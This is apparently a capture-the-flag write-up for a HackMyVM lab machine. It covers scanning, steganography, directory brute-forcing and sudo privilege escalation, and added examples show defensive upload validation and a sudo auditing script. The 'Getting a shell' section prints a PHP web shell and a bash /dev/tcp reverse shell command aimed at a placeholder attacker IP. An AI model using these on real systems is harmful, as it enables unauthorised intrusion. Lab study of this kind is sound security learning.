Information gathering
Host discovery
arp-scan -l
Port scan
┌──(root㉿kali)-[~]
└─# nmap -sV -p- -Pn 192.168.122.159
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-09 23:53 EDT
Nmap scan report for 192.168.122.159
Host is up (0.00090s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
MAC Address: 08:00:27:39:4C:EB (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.50 seconds
Anonymous FTP login
ftp <target-ip>
username: anonymous
An image is found in the first directory.
Running stegseek on it recovers a base64 string:
┌──(root㉿kali)-[~]
└─# stegseek first_Logo.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "firstgurl1"
[i] Original filename: "secret.txt".
[i] Extracting to "first_Logo.jpg.out".
┌──(root㉿kali)-[~]
└─# cat first_Logo.jpg.out
SGkgSSBoYWQgdG8gY2hhbmdlIHRoZSBuYW1lIG9mIHRoZSB0b2RvIGxpc3QgYmVjb3VzZSBkaXJlY3RvcnkgYnVzdGluZyBpcyB0b28gZWFzeSB0aGVlc2UgZGF5cyBhbHNvIEkgZW5jb2RlZCB0aGlzIGluIGJlc2E2NCBiZWNvdXNlIGl0IGlzIGNvb2wgYnR3IHlvdXIgdG9kbyBsaXN0IGlzIDogMmYgNzQgMzAgNjQgMzAgNWYgNmMgMzEgNzMgNzQgNWYgNjYgMzAgNzIgNWYgNjYgMzEgNzIgMzUgNzQgZG8gaXQgcXVpY2sgd2UgYXJlIHZ1bG5hcmFibGUgZG8gdGhlIGZpcnN0IGZpcnN0IA==
Decoded: Hi I had to change the name of the todo list becouse directory busting is too easy theese days also I encoded this in besa64 becouse it is cool btw your todo list is : 2f 74 30 64 30 5f 6c 31 73 74 5f 66 30 72 5f 66 31 72 35 74 do it quick we are vulnarable do the first first
Hex decoded: /t0d0_l1st_f0r_f1r5t
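As an added example (not part of the original writeup), a small Python decoder that peels both layers of the hidden note: the base64 text first, then the run of space-separated hex byte pairs embedded in it. The base64 blob is the one stegseek printed above; everything else is this example's own code and assumes only the standard library.

```python
import base64
import re

# Sample input for this example: the blob recovered by stegseek above.
ENCODED = (
    "SGkgSSBoYWQgdG8gY2hhbmdlIHRoZSBuYW1lIG9mIHRoZSB0b2RvIGxpc3QgYmVjb3VzZSBkaXJlY3Rv"
    "cnkgYnVzdGluZyBpcyB0b28gZWFzeSB0aGVlc2UgZGF5cyBhbHNvIEkgZW5jb2RlZCB0aGlzIGluIGJl"
    "c2E2NCBiZWNvdXNlIGl0IGlzIGNvb2wgYnR3IHlvdXIgdG9kbyBsaXN0IGlzIDogMmYgNzQgMzAgNjQg"
    "MzAgNWYgNmMgMzEgNzMgNzQgNWYgNjYgMzAgNzIgNWYgNjYgMzEgNzIgMzUgNzQgZG8gaXQgcXVpY2sg"
    "d2UgYXJlIHZ1bG5hcmFibGUgZG8gdGhlIGZpcnN0IGZpcnN0IA=="
)

# A run of at least four hex byte pairs, each pair a whole word separated by whitespace.
HEX_RUN = re.compile(r"(?:\b[0-9a-fA-F]{2}\b\s?){4,}")


def decode_base64(blob: str) -> str:
    """Strict base64 decode: bad characters or padding raise instead of yielding garbage."""
    return base64.b64decode(blob, validate=True).decode("utf-8")


def extract_hex_runs(text: str) -> list[str]:
    """Return every hex-pair run found in the text, decoded to a string."""
    runs = []
    for match in HEX_RUN.finditer(text):
        pairs = match.group(0).split()
        runs.append(bytes(int(p, 16) for p in pairs).decode("utf-8", errors="replace"))
    return runs


def decode_note(blob: str) -> tuple[str, list[str]]:
    """Base64 layer first, then any hex-encoded runs hidden in the plaintext."""
    text = decode_base64(blob)
    return text, extract_hex_runs(text)


if __name__ == "__main__":
    message, hidden = decode_note(ENCODED)
    print(message)
    print("hidden hex runs:", hidden)
```

The hex regex requires at least four consecutive pairs so that ordinary two-letter words such as "be" or "do" in the plaintext are not mistaken for bytes.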
Directory scan
That reveals a directory. The page there hints that files can be uploaded to the site, so we scan this directory:
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -t 100 -b 403,404 -x php,* -u http://192.168.122.159/t0d0_l1st_f0r_f1r5t/
/uploads (Status: 301) [Size: 340] [--> http://192.168.122.159/t0d0_l1st_f0r_f1r5t/uploads/]
/photos (Status: 301) [Size: 339] [--> http://192.168.122.159/t0d0_l1st_f0r_f1r5t/photos/]
/upload.php (Status: 200) [Size: 348]
So I upload a file and get a reverse shell through a one-line web shell.
Getting a shell
Uploaded file: shell.php
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
/uploads/shell.php?cmd=bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'
(the cmd value must be URL-encoded when the request is sent)
Reverse shell obtained.
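The upload endpoint above accepts a .php file and serves it from a web-reachable uploads directory, which is the whole reason the web shell works. As an added example that is neither part of the original writeup nor the target's code, here is the server-side check such an endpoint should perform, written in Python: an extension allow-list, exactly one extension, a file-signature check against the claimed type, and a scan for an embedded PHP open tag (image/PHP polyglots). The sample inputs in the test are constructed.

```python
import os
import re
import secrets

# Extension allow-list and the file signature(s) each extension must start with.
ALLOWED = {
    ".jpg":  (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png":  (b"\x89PNG\r\n\x1a\n",),
    ".gif":  (b"GIF87a", b"GIF89a"),
}

# A PHP open tag anywhere in the body marks a polyglot: valid image header, PHP code after it.
PHP_TAG = re.compile(rb"<\?php", re.IGNORECASE)


def validate_upload(filename: str, content: bytes) -> tuple[bool, str]:
    """Return (accepted, reason). Reject anything not provably an allowed image."""
    base = os.path.basename(filename)
    parts = base.split(".")
    # One dot only: this rejects shell.php.jpg, .htaccess and bare names alike.
    if len(parts) != 2 or not parts[0]:
        return False, "exactly one extension is required"
    ext = "." + parts[1].lower()
    if ext not in ALLOWED:
        return False, f"extension {ext} is not allowed"
    if not any(content.startswith(sig) for sig in ALLOWED[ext]):
        return False, f"content does not match the file signature for {ext}"
    if PHP_TAG.search(content):
        return False, "PHP open tag found inside file body"
    return True, "ok"


def stored_name(ext: str) -> str:
    """Server-chosen name: the client's filename never reaches the filesystem."""
    return secrets.token_hex(16) + ext


def save_upload(filename: str, content: bytes, upload_dir: str) -> str:
    """Validate, then write under a random name; raises ValueError on rejection."""
    accepted, reason = validate_upload(filename, content)
    if not accepted:
        raise ValueError(reason)
    ext = "." + os.path.basename(filename).split(".")[1].lower()
    path = os.path.join(upload_dir, stored_name(ext))
    with open(path, "wb") as fh:
        fh.write(content)
    return path
```

The content check is a backstop, not the primary control: the uploads directory should also be configured so the web server never executes scripts from it (with mod_php on Apache, `php_admin_flag engine off` in a `<Directory>` block for the upload path), and ideally images are re-encoded on the way in so that any trailing payload is discarded.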
user.txt:3120a57478d631a5ef82ef5d96146389
Privilege escalation
There is a user named first; try to escalate to that account.
www-data@first:/home/first$ sudo -l
sudo -l
Matching Defaults entries for www-data on first:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on first:
(first : first) NOPASSWD: /bin/neofetch
Use it to escalate to first (see the neofetch entry on gtfobins.github.io):
echo 'exec /bin/sh' >shell
sudo -u first /bin/neofetch --config shell
Escalated to first.
Escalate again: keep looking for usable commands.
first@first:~$ sudo -l
sudo -l
Matching Defaults entries for first on first:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User first may run the following commands on first:
(ALL) NOPASSWD: /bin/secret
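Both sudo -l listings above show exactly the pattern a defender should audit for: NOPASSWD rules, rules that run as root (ALL), and binaries with documented shell escapes. As an added example, not from the writeup, here is a Python script that parses sudo -l output and flags those conditions. The two sample listings are copied from this page; the binary list is a partial, hand-picked subset of sudo entries on gtfobins.github.io and the path checks are this example's own heuristics.

```python
import re

# One rule line of `sudo -l` output: "(runas_user : runas_group) TAG: command args".
RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")

# Binaries with a documented sudo shell escape on gtfobins.github.io (partial list).
SHELL_ESCAPE_BINARIES = {
    "neofetch", "vim", "vi", "nano", "less", "more", "find", "awk",
    "python", "python3", "perl", "env", "bash", "sh", "tar", "zip",
}

# Sample inputs: the two listings quoted in this writeup.
SAMPLE_WWW_DATA = r"""Matching Defaults entries for www-data on first:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on first:
    (first : first) NOPASSWD: /bin/neofetch
"""

SAMPLE_FIRST = r"""Matching Defaults entries for first on first:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User first may run the following commands on first:
    (ALL) NOPASSWD: /bin/secret
"""


def parse_sudo_l(text: str) -> list[dict]:
    """Collect the rules listed after the 'User X may run the following commands' line."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE.match(line)
        if not m:
            continue
        runas_user = m.group("runas").split(":")[0].strip()
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        rules.append({"runas_user": runas_user, "tags": tags, "cmd": m.group("cmd").strip()})
    return rules


def audit_rule(rule: dict) -> list[str]:
    """Return human-readable findings for one parsed rule."""
    findings = []
    if "NOPASSWD" in rule["tags"]:
        findings.append("no password required")
    if rule["runas_user"] in ("ALL", "root"):
        findings.append("runs as root")
    cmd = rule["cmd"]
    if cmd == "ALL":
        findings.append("any command allowed")
        return findings
    exe = cmd.split()[0].rsplit("/", 1)[-1]
    if exe in SHELL_ESCAPE_BINARIES:
        findings.append(f"{exe} has a documented sudo shell escape")
    if "*" in cmd:
        findings.append("wildcard in command arguments")
    return findings


def audit_sudo_l(text: str) -> list[dict]:
    """Parse a sudo -l listing and attach findings to every rule."""
    return [dict(rule, findings=audit_rule(rule)) for rule in parse_sudo_l(text)]


if __name__ == "__main__":
    for sample in (SAMPLE_WWW_DATA, SAMPLE_FIRST):
        for rule in audit_sudo_l(sample):
            print(rule["cmd"], "->", "; ".join(rule["findings"]) or "no findings")
```

The first listing is risky even though it does not reach root: neofetch honours a user-supplied --config, so a rule that exposes it should drop NOPASSWD or point at a fixed wrapper. The second grants a custom binary as root without a password, so that binary needs the same review as any other root-run code; the same checks apply equally to /etc/sudoers and sudoers.d fragments.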
Running secret asks you for a password ("pass"); whatever you type, nothing seems to happen. From the writeup "First – Hackmyvm – 0xH3rshel" on 0xH3rshel's blog I learned that if the entered string is longer than 10 characters it prompts for a command, and entering bash gives root. I honestly could not manage the reverse engineering here myself (still a noob).
sudo secret
pass: 123456789456123
correct, input command:bash
id
uid=0(root) gid=0(root) groups=0(root)
Root flag: 477d9a6aa33e3818ced1ad3015******
Key takeaways
- Binary analysis
- Using stegseek to find content hidden in images